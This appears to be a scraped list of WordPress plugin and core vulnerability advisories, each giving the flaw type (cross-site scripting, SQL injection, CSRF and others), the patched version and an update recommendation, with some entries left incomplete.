Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery to Product Manipulation
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: JoomSport – for Sports: Team & League, Football, Hockey & more

Vulnerability: SQL Injection
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: flowpaper

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Mobile App Builder by WapPress

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.64
Recommended Action: Update to version 1.9.64, or a newer patched version

Plugin: Simple Calendar – Google Calendar Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Registration, User Profile, Membership, Content Restriction, User Directory, and Frontend Post Submission – WP User Frontend

Vulnerability: Authenticated (Author+) Privilege Escalation
Patched Version: 3.6.6
Recommended Action: Update to version 3.6.6, or a newer patched version

Plugin: ImageMapper

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Page/Post Deletion via imgmap_delete_area_ajax
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Job Board

Vulnerability: Local File Inclusion
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Plugin: Custom Dashboard Widgets

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting via cdw_DashboardWidgets
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Kraken.io Image Optimizer

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.6
Recommended Action: Update to version 2.6.6, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 0.9.90
Recommended Action: Update to version 0.9.90, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Request Forgery via ‘display_results’
Patched Version: 8.1.16
Recommended Action: Update to version 8.1.16, or a newer patched version

Plugin: ExportFeed: List WooCommerce Products on eBay Store

Plugin: Ocean Extra

Vulnerability: Authenticated (Subscriber+) Arbitrary Post Access
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Basic Interactive World Map

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Web en Mantenimiento

Plugin: Welcart e-Commerce

Vulnerability: Object Injection
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Smart SEO Tool – SEO优化插件

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: Yoast Duplicate Post

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: WP DSGVO Tools (GDPR)

Vulnerability: Unauthenticated Arbitrary Post Deletion
Patched Version: 3.1.24
Recommended Action: Update to version 3.1.24, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Cross-Site Scripting
Patched Version: 3.9.8
Recommended Action: Update to version 3.9.8, or a newer patched version

Plugin: PDF24 Article To PDF

Plugin: SportsPress – Sports Club & League Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.9
Recommended Action: Update to version 2.7.9, or a newer patched version

Plugin: 微信群发助手-Wechat Broadcast

Plugin: ImageRecycle pdf & image compression

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.12
Recommended Action: Update to version 3.1.12, or a newer patched version

Plugin: WordPress Mobile Pack – Mobile Plugin for Progressive Web Apps & Hybrid Mobile Apps

Vulnerability: Sensitive Information Exposure
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Beaver Builder – WordPress Page Builder

Vulnerability: Authenticated Stored Cross-Site Scripting via Caption
Patched Version: 2.5.5.3
Recommended Action: Update to version 2.5.5.3, or a newer patched version

Plugin: Auto Excerpt everywhere

Plugin: Unyson

Vulnerability: Cross-Site Scripting
Patched Version: 2.7.27
Recommended Action: Update to version 2.7.27, or a newer patched version

Plugin: Multi-column Tag Map

Vulnerability: Authenticated (Contributor+) Stored Cross Site Scripting
Patched Version: 17.0.25
Recommended Action: Update to version 17.0.25, or a newer patched version

Plugin: Essential Grid Portfolio – Photo Gallery

Vulnerability: Missing Authorization
Patched Version: 3.0.19
Recommended Action: Update to version 3.0.19, or a newer patched version

Plugin: WP Easy Gallery – WordPress Gallery Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: DW Question Answer Pro

Plugin: Hide My WP – Amazing Security Plugin for WordPress!

Vulnerability: Authorization Bypass
Patched Version: 6.2.4
Recommended Action: Update to version 6.2.4, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 8.1.12
Recommended Action: Update to version 8.1.12, or a newer patched version

Plugin: Logo Carousel – Responsive Logo Slider, Logo Showcase, and Clients Logo Gallery

Vulnerability: Unauthorised Private Post Access
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Simple Sticky Footer

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Delete Old Orders

Plugin: Modern Events Calendar Lite

Vulnerability: Subscriber+ Category Add Leading to Stored Cross-Site Scripting
Patched Version: 6.2.0
Recommended Action: Update to version 6.2.0, or a newer patched version

Plugin: Advanced Ads – Ad Manager & AdSense

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.17.4
Recommended Action: Update to version 1.17.4, or a newer patched version

Plugin: Media File Renamer: Rename for better SEO (AI-Powered)

Vulnerability: Authenticated(Administrator+) Remote Code Execution
Patched Version: 5.7.8
Recommended Action: Update to version 5.7.8, or a newer patched version

Plugin: Multiple Roles

Vulnerability: Privilege Escalation
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: SEO Slider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: WordPress Live Chat Plugin for Elementor – LiveChat

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Easy Custom Auto Excerpt

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Insecure Backup/Logfile Generation
Patched Version: 5.3.1
Recommended Action: Update to version 5.3.1, or a newer patched version

Plugin: FourSquare Checkins

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: SiteBuilder Dynamic Components

Plugin: Photospace Gallery

Vulnerability: Missing Authorization to Plugin Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPshop 2 – E-Commerce

Vulnerability: Arbitrary File Upload
Patched Version: 1.3.9.6
Recommended Action: Update to version 1.3.9.6, or a newer patched version

Plugin: Quiz Expert – Easy Quiz Maker, Exam and Test Manager

Plugin: Simple Download Monitor

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.3.9
Recommended Action: Update to version 3.3.9, or a newer patched version

Plugin: Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.5.1
Recommended Action: Update to version 5.5.1, or a newer patched version

Plugin: WP CSV Exporter

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: xili-tidy-tags

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.12.04
Recommended Action: Update to version 1.12.04, or a newer patched version

Plugin: MyCurator Content Curation

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.75
Recommended Action: Update to version 3.75, or a newer patched version

Plugin: Visitor Traffic Real Time Statistics

Vulnerability: Missing Authorization to Arbitrary Plugin Installation/Activation
Patched Version: 2.12
Recommended Action: Update to version 2.12, or a newer patched version

Plugin: WordPress WP-Advanced-Search

Vulnerability: SQL Injection
Patched Version: 3.3.7
Recommended Action: Update to version 3.3.7, or a newer patched version

Plugin: Check & Log Email – Easy Email Testing & Mail logging

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.5.2
Recommended Action: Update to version 0.5.2, or a newer patched version

Plugin: YOP Poll

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.8.1
Recommended Action: Update to version 5.8.1, or a newer patched version

Plugin: Download Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.54
Recommended Action: Update to version 3.2.54, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Insecure Direct Object Reference
Patched Version: 7.3.7
Recommended Action: Update to version 7.3.7, or a newer patched version

Plugin: Counter Box: Add Engaging Countdowns, Timers & Counters to Your WordPress Site

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Limit Login Attempts

Vulnerability: Authenticated(Subscriber+) Stored Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.86
Recommended Action: Update to version 1.0.86, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.25
Recommended Action: Update to version 3.3.25, or a newer patched version

Plugin: WP Job Openings – Job Listing, Career Page and Recruitment Plugin

Vulnerability: Information Exposure
Patched Version: 3.4.3
Recommended Action: Update to version 3.4.3, or a newer patched version

Plugin: Calculated Fields Form

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.0.354
Recommended Action: Update to version 1.0.354, or a newer patched version

Plugin: Easy Testimonials

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9
Recommended Action: Update to version 3.9, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.39
Recommended Action: Update to version 3.39, or a newer patched version

Plugin: Table Rate Shipping Method for WooCommerce by Flexible Shipping

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.11.9
Recommended Action: Update to version 4.11.9, or a newer patched version

Plugin: Simple Login Log

Vulnerability: SQL Injection
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Acunetix WP Security

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: Find and Replace All

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Video Conferencing with Zoom

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: Blog Designer

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.8.12
Recommended Action: Update to version 1.8.12, or a newer patched version

Plugin: eBecas

Core: WordPress

Vulnerability: Authenticated (Author+) Cross-Site Scripting via File Uploads
Patched Version: 3.7.33
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.33, 3.8.33, 3.9.31, 4.0.30, 4.1.30, 4.2.27, 4.3.23, 4.4.22, 4.5.21, 4.6.18, 4.7.17, 4.8.13, 4.9.14, 5.0.9, 5.1.5, 5.2.6, 5.3.3, 5.4.1

Plugin: Announcement & Notification Banner – Bulletin

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: Ninja Tables – Easy Data Table Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.3.5
Recommended Action: Update to version 4.3.5, or a newer patched version

Plugin: eShop

Vulnerability: Cross-Site Forgery Request and Reflected Cross-Site Scripting
Patched Version: 6.3.14
Recommended Action: Update to version 6.3.14, or a newer patched version

Plugin: EDD Favorites

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: amerisale-re

Plugin: Encrypted Blog

Vulnerability: Open Redirect
Patched Version: 0.0.6.6
Recommended Action: Update to version 0.0.6.6, or a newer patched version

Plugin: Featured Post Creative

Vulnerability: Cross-Site Request Forgery via wpfp_update_featured_post
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: My Tickets – Accessible Event Ticketing

Vulnerability: Authorization Bypass
Patched Version: 1.9.12
Recommended Action: Update to version 1.9.12, or a newer patched version

Plugin: bbPress Voting

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.11.1
Recommended Action: Update to version 2.1.11.1, or a newer patched version

Plugin: Mega Addons For WPBakery Page Builder

Plugin: Thumbnail Slider With Lightbox

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.18
Recommended Action: Update to version 1.0.18, or a newer patched version

Plugin: WP Vault

Vulnerability: Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Animated Counters

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Core: WordPress

Vulnerability: Full Path Disclosure
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: easy.jobs- Best Recruitment Plugin for Job Board Listing, Manager, Career Page for Elementor & Gutenberg

Vulnerability: Missing Authorization to Settings Update
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: Mark Posts

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Human Presence – Stop Form Spam Without ReCaptcha

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Core: WordPress

Vulnerability: Cryptographic Weakness
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Stout Google Calendar

Vulnerability: Cross-Site Request Forgery via sgc_plugin_options
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Affiliates Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.6
Recommended Action: Update to version 2.6.6, or a newer patched version

Plugin: Amazonify

Vulnerability: Cross-Site Request Forgery to Amazon Tracking ID Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YOP Poll

Vulnerability: Reusable Captcha via validateImage
Patched Version: 6.5.29
Recommended Action: Update to version 6.5.29, or a newer patched version

Plugin: WCP Contact Form

Vulnerability: Reflected Cross-Site Scripting via tab parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: API info for Plugins & Themes from WP.ORG

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.05
Recommended Action: Update to version 1.05, or a newer patched version

Plugin: Anti-Malware Security and Brute-Force Firewall

Vulnerability: Cross-Site Scripting
Patched Version: 4.15.23
Recommended Action: Update to version 4.15.23, or a newer patched version

Plugin: S3bubble Amazon S3 Media Streaming

Plugin: SrbTransLatin – Serbian Latinisation

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.47
Recommended Action: Update to version 1.47, or a newer patched version

Plugin: Predictive Search

Vulnerability: Missing Authorization
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Plugin: Hover Image

Core: WordPress

Vulnerability: Missing Authorization Checks
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Forms

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.12.3
Recommended Action: Update to version 1.12.3, or a newer patched version

Plugin: Relevanssi – A Better Search (Pro)

Vulnerability: SQL Injection
Patched Version: 1.14.6.1
Recommended Action: Update to version 1.14.6.1, or a newer patched version

Plugin: Helpful

Vulnerability: Authorization Bypass to Repeat Voting
Patched Version: 4.5.15
Recommended Action: Update to version 4.5.15, or a newer patched version

Plugin: Clean Login

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Information Disclosure via updraft_ajaxrestore
Patched Version: 1.23.1
Recommended Action: Update to version 1.23.1, or a newer patched version

Plugin: Barcode Scanner and Inventory manager. POS (Point of Sale) – scan barcodes & create orders with barcode reader.

Vulnerability: Unauthenticated Arbitrary File Upload via uploadFile
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Custom Field Template

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Font Organizer

Plugin: Poll Maker – Versus Polls, Anonymous Polls, Image Polls

Vulnerability: Missing Authorization
Patched Version: 4.8.1
Recommended Action: Update to version 4.8.1, or a newer patched version

Plugin: Watu Quiz

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 2.6.8
Recommended Action: Update to version 2.6.8, or a newer patched version

Plugin: WordPress Checkout

Plugin: Exploit Scanner

Plugin: WooSidebars Sidebar Manager Converter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Stetic

Vulnerability: No subtitle
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: WordPress Calls to Action

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: bird-feeder

Plugin: Pricing Tables For WPBakery Page Builder (formerly Visual Composer)

Vulnerability: Authenticated (Subscriber+) Local File Inclusion via Shortcode
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Community by PeepSo – Download from PeepSo.com

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 6.1.0.0
Recommended Action: Update to version 6.1.0.0, or a newer patched version

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: Missing Authorization to Plugin Settings Reset
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Admin Custom Login

Vulnerability: No subtitle
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: Easy Digital Downloads – Recount Earnings

Plugin: GEO Redirector

Plugin: Smart Forms – when you need more than just a contact form

Vulnerability: Missing Authorization to Sensitive Information Disclosure
Patched Version: 2.6.71
Recommended Action: Update to version 2.6.71, or a newer patched version

Plugin: Appointment Calendar

Vulnerability: Multiple Reflected Cross-Site Scripting
Patched Version: 2.7.5
Recommended Action: Update to version 2.7.5, or a newer patched version

Plugin: Debug Meta Data

Plugin: WP Client Reports

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 1.0.17
Recommended Action: Update to version 1.0.17, or a newer patched version

Plugin: URL Shortener by MyThemeShop

Plugin: Cart66 Lite :: WordPress Ecommerce

Vulnerability: SQL Injection
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Quick Post Duplicator

Vulnerability: Authenticated (Contributor+) SQL Injection via post_id
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popup Images

Plugin: Customer Reviews for WooCommerce

Vulnerability: Sensitive Data Exposure
Patched Version: 5.3.6
Recommended Action: Update to version 5.3.6, or a newer patched version

Plugin: Oxygen

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.4
Recommended Action: Update to version 4.4, or a newer patched version

Plugin: Statify – Extended Evaluation

Vulnerability: Authenticated (Admin+) CSV Injection
Patched Version: 2.6.4
Recommended Action: Update to version 2.6.4, or a newer patched version

Plugin: WPlite

Plugin: Request a Quote

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: Shortcode for Current Date

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: Rating by BestWebSoft

Vulnerability: Rating Denial of Service
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Smart Marketing SMS and Newsletters Forms

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.8.1
Recommended Action: Update to version 1.4.8.1, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Captcha Bypass
Patched Version: 4.1.3
Recommended Action: Update to version 4.1.3, or a newer patched version

Plugin: Paytm Payment Gateway

Vulnerability: Unauthenticated Server-Side Request Forgery
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: Albo Pretorio On line

Vulnerability: Unauthenticated Sensitive Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Super Cache

Vulnerability: Cross Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Team Member – Multi Language Supported Team Plugin

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting via new_style_name
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: Unyson

Plugin: teachPress

Vulnerability: Cross-Site Request Forgery via delete_database()
Patched Version: 9.0.6
Recommended Action: Update to version 9.0.6, or a newer patched version

Plugin: Mesmerize Companion

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.6.135
Recommended Action: Update to version 1.6.135, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary User Password Reset
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: Modula Image Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.7
Recommended Action: Update to version 2.6.7, or a newer patched version

Plugin: Cooked Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.5.6
Recommended Action: Update to version 1.7.5.6, or a newer patched version

Plugin: WPMobile.App — Android and iOS Mobile Application

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 11.19
Recommended Action: Update to version 11.19, or a newer patched version

Plugin: spideranalyse

Plugin: Q and A

Plugin: iPanorama 360 – Advanced Virtual Tour Builder

Vulnerability: Authenticated (Contributor+) SQL Injection via Shortcode
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Smooth Slider

Vulnerability: Authenticated SQL Injection
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.4.8
Recommended Action: Update to version 3.4.8, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Subscriber+) Information Disclosure via ‘mf_first_name’ shortcode
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Smooth Slider

Vulnerability: Authenticated SQL Injection
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: MainWP Post Plus Extension

Vulnerability: Missing Authorization to Arbitrary Page/Post Deletion
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: WP Ultimate Email Marketer

Plugin: YITH Maintenance Mode

Vulnerability: Multiple Authenticated Stored Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: User Registration & Membership – Custom Registration Form, Login Form, and User Profile

Vulnerability: Authenticated (Subscriber+) PHP Object Injection
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: EasyRecipe

Plugin: Modula Image Gallery

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 2.6.91
Recommended Action: Update to version 2.6.91, or a newer patched version

Plugin: Under Construction / Maintenance Mode from Acurax

Plugin: Comments – wpDiscuz

Vulnerability: Authenticated(Author+) Insecure Direct Object Reference
Patched Version: 7.6.4
Recommended Action: Update to version 7.6.4, or a newer patched version

Plugin: WP Shamsi – افزونه تاریخ شمسی و فارسی ساز وردپرس

Vulnerability: Missing Authorization to Plugin Settings Update
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Plugin: Icons for Features

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.1.3
Recommended Action: Update to version 1.5.1.3, or a newer patched version

Plugin: Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager

Vulnerability: Authenticated (Author+) Arbitrary File Upload
Patched Version: 2.9.3
Recommended Action: Update to version 2.9.3, or a newer patched version

Plugin: H5P CSS Editor

Plugin: Avada (Fusion) Builder

Vulnerability: Missing Authorization
Patched Version: 3.11.2
Recommended Action: Update to version 3.11.2, or a newer patched version

Plugin: GTM Server Side

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 8.0.27
Recommended Action: Update to version 8.0.27, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Reflected Cross-Site Scripting via ‘wpforo_debug’
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: wordpress-gallery-transformation

Plugin: Ivory Search – WordPress Search Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.8
Recommended Action: Update to version 4.8, or a newer patched version

Plugin: YARPP – Yet Another Related Posts Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 5.30.4
Recommended Action: Update to version 5.30.4, or a newer patched version

Plugin: Rename wp-login.php

Vulnerability: Cross-Site Request Forgery & Unauthenticated Settings Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pixabay Images

Vulnerability: Directory Traversal
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: My Agile Privacy – The only GDPR solution for WP that you can truly trust

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting vis Shortcode
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting

Vulnerability: Sensitive Data Exposure
Patched Version: 1.10.6
Recommended Action: Update to version 1.10.6, or a newer patched version

Plugin: CP Blocks

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 1.0.21
Recommended Action: Update to version 1.0.21, or a newer patched version

Plugin: Social Count Plus

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Easy Media Gallery Pro

Vulnerability: Cross-Site Request Forgery and Cross-Site Scripting
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Authenticated(level_5+) SQL Injection via get_logs
Patched Version: 2.8.22
Recommended Action: Update to version 2.8.22, or a newer patched version

Plugin: CallRail Phone Call Tracking

